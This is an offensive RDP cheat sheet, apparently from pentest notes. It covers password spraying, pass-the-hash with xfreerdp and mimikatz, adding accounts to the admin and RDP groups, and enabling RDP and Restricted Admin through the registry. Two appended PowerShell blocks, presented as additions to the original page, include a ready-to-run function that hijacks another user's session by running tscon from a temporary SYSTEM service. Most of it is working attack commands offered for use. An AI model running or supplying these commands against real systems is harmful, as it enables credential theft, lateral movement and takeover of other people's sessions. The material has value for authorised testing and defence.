RDP

Port : 3389

Enumeration

#Bruteforce / password spray. Check the lockout policy first (net accounts /domain) and spray one password across many users rather than many passwords per user.
#https://github.com/xFreed0m/RDPassSpray (note: passwords containing spaces make the tool fail)
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]

#-t 1 / -W 3 / -c 5: one connection at a time with waits between attempts, as hydra's own rdp module warning advises; -f stops on the first valid pair for a host
hydra -V -f -L ./users.txt -P ./passwords.txt rdp -M targets.txt -t 1 -W 3 -c 5

Connect with known credentials/hash

#Give the user RDP access first if needed (the RDP group is "Remote Desktop Users"; "Remote Management Users" only covers WinRM)
#net localgroup administrators userx /add
#net localgroup "Remote Desktop Users" userx /add

#rdesktop: share /usr/share/windows-binaries on the target as "tmp", prompt for the password (-p -)
rdesktop -g 95% -r disk:tmp=/usr/share/windows-binaries -u pelota -p - 192.168.30.30
#xfreerdp: ignore the certificate, share /localdir as "share", resize with the window, shared clipboard
xfreerdp /u:admin /p:password /cert:ignore /v:10.10.138.3 /workarea /drive:/localdir,share /dynamic-resolution +clipboard

#In case of error ERRCONNECT_CONNECT_TRANSPORT_FAILED, force the security layer with this flag:
/sec:tls

#Pass-the-hash over RDP only works if Restricted Admin mode is enabled on the target (DisableRestrictedAdmin = 0)
xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<IP>
#Same thing from a Windows box with mimikatz: inject the hash, then start mstsc in restricted admin mode
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:"mstsc.exe /restrictedadmin"

#Enable Restricted Admin (elevated PowerShell on the target; a value that is missing or non-zero means it is off)
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
  • /drive:LOCAL_DIRECTORY,SHARE_NAME -- creates a shared drive between the attacking machine and the target. This switch is very useful: the toolkit can be run straight from the share and any output saved back to the attacker's disk, so no tool binaries need to be dropped on the target's filesystem. For example, to share the current directory as a share called share, use /drive:.,share (the period refers to the current directory).

Once mapped, the share is reachable from the command line as \\tsclient\SHARE_NAME, or through File Explorer under "This PC".

#Avoid the client-side credential prompt that appears before the remote desktop connection is established (Remote Desktop Connection 6.0+ behaviour):
https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remote-desktop-connection-6-prompts-credentials

Enable RDP

#PowerShell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

#Alternative
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

#Disable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f; Disable-NetFirewallRule -DisplayGroup "Remote Desktop"
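The enable/disable steps above, as an added example that is not part of the original page: a PowerShell audit function that reads the same registry values and firewall rule group, plus enable/disable wrappers that confirm TCP/3389 is actually listening instead of assuming it. It assumes an elevated prompt on the target; the function names (Get-RdpState, Enable-Rdp, Disable-Rdp) are my own, the registry paths are the standard ones.

```powershell
# Added example (not from the original page): audit, enable and disable RDP
# with the same registry values and firewall rule group used above, and verify
# that the listener actually came up. Run from an elevated PowerShell prompt.
# Function names are my own; the registry paths are the standard ones.

$TsPath  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$NlaPath = "$TsPath\WinStations\RDP-Tcp"
$LsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-RdpState {
    # One object with the settings that decide whether (and how) RDP is reachable.
    $fw  = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue)
    $lsa = Get-ItemProperty -Path $LsaPath -Name DisableRestrictedAdmin -ErrorAction SilentlyContinue
    [pscustomobject]@{
        RdpDenied       = (Get-ItemProperty -Path $TsPath  -Name fDenyTSConnections).fDenyTSConnections -eq 1
        NlaRequired     = (Get-ItemProperty -Path $NlaPath -Name UserAuthentication).UserAuthentication -eq 1
        # Value absent or non-zero means Restricted Admin (and so RDP pass-the-hash) is off.
        RestrictedAdmin = ($null -ne $lsa) -and ($lsa.DisableRestrictedAdmin -eq 0)
        FirewallRulesOn = @($fw | Where-Object { $_.Enabled -eq 'True' }).Count
        FirewallRules   = $fw.Count
        Listening3389   = [bool](Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue)
    }
}

function Enable-Rdp {
    param([bool]$RequireNla = $true)   # NLA rejects unauthenticated clients before the logon screen
    Set-ItemProperty -Path $TsPath  -Name fDenyTSConnections -Value 0
    Set-ItemProperty -Path $NlaPath -Name UserAuthentication -Value ([int]$RequireNla)
    Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
    # TermService is Manual on workstations; make sure it is running before polling the port.
    Set-Service -Name TermService -StartupType Automatic
    Start-Service -Name TermService
    $deadline = (Get-Date).AddSeconds(15)
    while (-not (Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue)) {
        if ((Get-Date) -gt $deadline) { throw 'TCP/3389 never started listening; check TermService and the System event log.' }
        Start-Sleep -Seconds 1
    }
    Get-RdpState
}

function Disable-Rdp {
    Set-ItemProperty -Path $TsPath -Name fDenyTSConnections -Value 1
    Disable-NetFirewallRule -DisplayGroup 'Remote Desktop'
    Get-RdpState
}

# Usage (elevated):
#   Get-RdpState                 # audit only
#   Enable-Rdp                   # enable with NLA and confirm the port is listening
#   Enable-Rdp -RequireNla $false
#   Disable-Rdp
```

Get-RdpState is the part worth keeping on an engagement: it tells you in one call whether the target denies connections, whether NLA will block an unauthenticated probe, whether Restricted Admin (needed for the /pth: connection above) is on, and whether the port is really bound.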

RDP Hijack

Exploitation

  • List logged-on sessions (user, session name, ID, state): query user (alias: quser)

#Hijack the admin's session: tscon only skips the password check when it runs as SYSTEM, hence the service
sc create a binpath= "cmd.exe /k tscon <admin's session ID> /dest:<your session name>"
#net start will time out with error 1053 (cmd.exe never reports to the SCM); the session has already switched by then
net start a
sc.exe delete a
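The hijack sequence above, as an added example that is not part of the original page: a PowerShell function that parses the fixed-width output of query user into objects (including disconnected sessions, which print an empty SESSIONNAME column), and a second one that creates the tscon service against a chosen session ID and removes it afterwards. It assumes an elevated prompt on the target; the function names and the service name sesshijack are my own choices.

```powershell
# Added example (not from the original page): enumerate sessions by parsing
# `query user` and hijack one with tscon from a SYSTEM service, the same
# sc/tscon trick as above. Run from an elevated prompt; the service name
# 'sesshijack' and the function names are my own choices.

function Get-RdpSession {
    # query user prints fixed-width columns:
    #   USERNAME  SESSIONNAME  ID  STATE  IDLE TIME  LOGON TIME
    # A leading '>' marks the session this shell belongs to.
    $lines = @(query user | Where-Object { $_ -match '\S' })
    if ($lines.Count -lt 2) { return }      # header only, or "No User exists"
    foreach ($line in ($lines | Select-Object -Skip 1)) {
        $isCurrent = $line.StartsWith('>')
        $f = $line.TrimStart('>').Trim() -split '\s{2,}'
        # Disconnected sessions print an empty SESSIONNAME, which collapses the split.
        if ($f.Count -eq 5) { $f = @($f[0], '') + $f[1..4] }
        if ($f.Count -lt 6) { continue }    # unexpected layout: skip rather than guess
        [pscustomobject]@{
            UserName    = $f[0]
            SessionName = $f[1]
            Id          = [int]$f[2]
            State       = $f[3]
            IdleTime    = $f[4]
            LogonTime   = $f[5]
            Current     = $isCurrent
        }
    }
}

function Invoke-RdpSessionHijack {
    param(
        [Parameter(Mandatory)][int]$TargetId,
        [string]$ServiceName = 'sesshijack'
    )
    $me = Get-RdpSession | Where-Object { $_.Current }
    if (-not $me) { throw 'Could not find our own session; run this from an interactive session.' }
    if ($me.Id -eq $TargetId) { throw 'Refusing to hijack our own session.' }

    # tscon attaches session <TargetId> to the display of our session. Only SYSTEM
    # may do that without the target user's password, which is why it runs as a service.
    $cmd = "cmd.exe /k tscon $TargetId /dest:$($me.SessionName)"
    sc.exe create $ServiceName binpath= $cmd | Out-Null
    # sc start returns while the service is still START_PENDING; cmd.exe never reports
    # to the SCM, so the SCM gives up on it later, but tscon has run long before that.
    sc.exe start $ServiceName | Out-Null
    Start-Sleep -Seconds 3
    sc.exe delete $ServiceName | Out-Null
}

# Usage:
#   Get-RdpSession | Format-Table -AutoSize
#   Invoke-RdpSessionHijack -TargetId 2
```

Disconnected sessions (STATE = Disc) are the usual targets, since nobody is looking at them. The service installation this leaves (System log event 7045, with tscon in the binary path) is the loudest artifact, so expect detection rules keyed on exactly that.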